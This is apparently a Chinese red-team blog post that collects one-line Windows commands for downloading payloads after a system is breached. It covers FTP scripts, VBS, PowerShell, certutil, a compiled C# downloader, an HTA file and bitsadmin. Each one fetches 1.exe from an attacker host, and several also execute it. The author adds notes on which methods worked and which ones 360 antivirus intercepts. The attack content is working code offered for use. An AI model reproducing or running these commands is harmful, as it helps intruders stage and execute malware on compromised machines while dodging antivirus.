zoukankan      html  css  js  c++  java
  • 一句话下载总结(用于后渗透上传payload)

    利用ftp来下载payload文件

    echo open 192.168.1.1 21> ftp.txt
    echo ftp>> ftp.txt
    echo bin >> ftp.txt
    echo ftp>> ftp.txt
    echo GET 1.exe >> ftp.txt
    ftp -s:ftp.txt
    

    后记:这个我没有实验成功太菜了

    利用vbs来下载payload

    Set Post = CreateObject("Msxml2.XMLHTTP")
    Set Shell = CreateObject("Wscript.Shell")
    Post.Open "GET","http://192.168.1.1/1.exe",0
    Post.Send()
    Set aGet = CreateObject("ADODB.Stream")
    aGet.Mode = 3
    aGet.Type = 1
    aGet.Open()
    aGet.Write(Post.responseBody)
    aGet.SaveToFile "C:	est1.exe",2
    

    后记:这个已经利用成功了,网上说可以用script来执行,可能win10上面没有,但是可以直接双击运行,或者命令行里面直接使用,vbs脚本后缀为vbs

    利用Powershell来下载payload

    powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/1.exe','C:	est1.exe');start-process 'C:	est1.exe'
    
    

    后记:是在命令行中执行以上命令

    利用certutil下载文件

    直接下载certutil.exe -urlcache -split -f http://192.168.1.1/1.exe

    指定文件名保存certutil.exe -urlcache -split -f http://192.168.1.1/1.txt 1.php

    删除缓存certutil.exe -urlcache -split -f http://192.168.1.1/1.exe delete
    查看缓存certutil.exe -urlcache *

    至于这个缓存有什么用就不知道了
    后记:下载的文件就在当前目录并且文件名与url相同(除非指定文件名保存),360会拦截

    利用CSC(windows的c#编译器)来下载文件

    1.cs文件内容

    using System.Net;
    namespace downloader
    {
        class Program
        {
            static void Main(string[] args)
            {
                WebClient client = new WebClient();
                string URLAddress = @"http://192.168.1.1/1.exe";
                string receivePath = @"C:	est";
                client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName
            (URLAddress));
            }
        }
    }
    

    后记:csc.exe位于C:WindowsMicrosoft.NETFrameworkv2.0.50727。因为未加入环境变量中所以需要指定路径。
    使用方式:C:WindowsMicrosoft.NETFrameworkv2.0.50727csc.exe /out:C: es
    tdownload.exe C: est1.cs

    这样1.cs就会被编辑为exe文件,我们运行一下就会把文件下载下来了,360会进行拦截,估计是捕获了下载的时候的流量了,因为并不是直接就拦截了

    hta下载文件

    将下列代码保存至.hta文件

    <html>
    <head>
    <script>
    var Object = new ActiveXObject("MSXML2.XMLHTTP");
    Object.open("GET","http://192.168.1.1/1.exe",false);
    Object.send();
    if (Object.Status == 200)
    {
        var Stream = new ActiveXObject("ADODB.Stream");
        Stream.Open();
        Stream.Type = 1;
        Stream.Write(Object.ResponseBody);
        Stream.SaveToFile("C:\test\1.exe", 2);
        Stream.Close();
    }
    window.close();
    </script>
    <HTA:APPLICATION
    WINDOWSTATE = "minimize">
    </head>
    <body>
    </body>  
    </html>
    

    后记:直接双击运行既可或者命令行直接执行,360会拦截

    利用bitsadmin下载文件

    bitsadmin是一个控制台工具,可用于创建下载或上传工作和监测其进展情况。xp以后的Windows系统自带

    bitsadmin /transfer n http://192.168.1.1/1.exe C: estupdate1.exe

    后记:不支持https/ftp协议,php/python自带的服务器会报错,360会拦截

    总结,其实感觉Windows上可以玩的东西比Linux多,使用的也比Linux多,这可能也是红蓝对抗偏向于这边的原因吧

  • 相关阅读:
    风险分解结构
    WBS 工作分解结构
    react函数式组件(非路由组件)实现路由跳转
    react使用antd组件递归实现左侧菜单导航树
    React4.0以上如何获取当前的路由地址呢
    浅谈react传入路由参数---withRouter组件
    react项目实现维持登录与自动登录
    async和await应用步骤分析+优化异常处理
    跨域场景&&跨域处理方案
    vscode react中标签自动补全 vscode jsx语法自动补全html标签
  • 原文地址:https://www.cnblogs.com/Mikasa-Ackerman/p/yi-ju-hua-xia-zai-zong-jie-yong-yu-hou-shen-tou-sh.html
Copyright © 2011-2022 走看看